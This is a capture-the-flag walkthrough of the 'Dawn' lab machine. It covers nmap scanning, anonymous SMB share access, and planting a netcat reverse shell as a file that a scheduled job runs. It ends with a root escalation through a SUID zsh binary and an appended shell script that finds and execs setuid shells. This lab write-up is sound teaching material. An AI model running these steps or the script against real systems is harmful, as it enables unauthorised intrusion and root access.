Dawn
Nmap
sudo nmap 192.168.152.11 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWN

On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.
smbclient -U '' -L \\\\192.168.152.11\\
We then connect directly to the ITDEPT share.

I then used curl to test for file upload on the share and confirmed I was able to upload a PHP reverse shell, which might come in handy later.

Running dirsearch.py on port 80 reveals two interesting directories.

Moving into logs shows a list of log files, of which management.log is the only one we have permission to read.

Reading the log file, the lines below appear repeatedly.
Since the log shows a file named web-control being executed and we have write access to the ITDEPT share, we can upload a reverse shell named web-control, and in theory it will be run for us.
First I created a file called web-control and inserted a netcat reverse shell into it.
This was then uploaded to the SMB share.

After doing so I soon receive a shell back on my netcat listener.

Then we can upgrade the shell to something nicer.
I then transferred linpeas from my attacking machine by uploading it to the SMB share. Running linpeas identifies the zsh binary as having the SUID bit set.

As zsh is a shell binary, all we need to do is execute the full path of zsh to gain a root shell. Unlike bash, which drops the effective UID at startup unless run with -p, zsh keeps the setuid effective UID, so no extra flag is needed.
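Reproducing the linpeas finding by hand and acting on it, as an added example that is not part of the original write-up. The path /usr/bin/zsh in the usage comment is an assumption; use whatever `find` actually reports on the box.

```shell
#!/bin/sh
# Added example, not from the original write-up. /usr/bin/zsh below is an
# assumed path for illustration only.

# filter_suid_shells: read one path per line on stdin and print only those
# whose basename is a shell that would give an interactive root shell.
filter_suid_shells() {
    while IFS= read -r path; do
        case "$(basename "$path")" in
            sh|bash|dash|zsh|ksh|csh|tcsh|fish) printf '%s\n' "$path" ;;
        esac
    done
}

# list_suid_shells: enumerate setuid-root files on the target and keep the shells.
list_suid_shells() {
    find / -perm -4000 -type f -user root 2>/dev/null | filter_suid_shells
}

# exec_suid_shell PATH: zsh keeps euid 0 by itself; bash needs -p or it
# resets the effective UID back to the caller's.
exec_suid_shell() {
    case "$(basename "$1")" in
        bash) exec "$1" -p ;;
        *)    exec "$1" ;;
    esac
}

# Usage on the target (nothing runs when this file is sourced without arguments):
#   sh suid.sh scan            -> list setuid shells
#   exec_suid_shell /usr/bin/zsh   (assumed path) -> euid 0 shell
if [ "${1:-}" = "scan" ]; then
    list_suid_shells
fi
```

Check the result with `id`: the shell reports euid=0 while uid stays the unprivileged account, which is what a setuid shell gives you.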
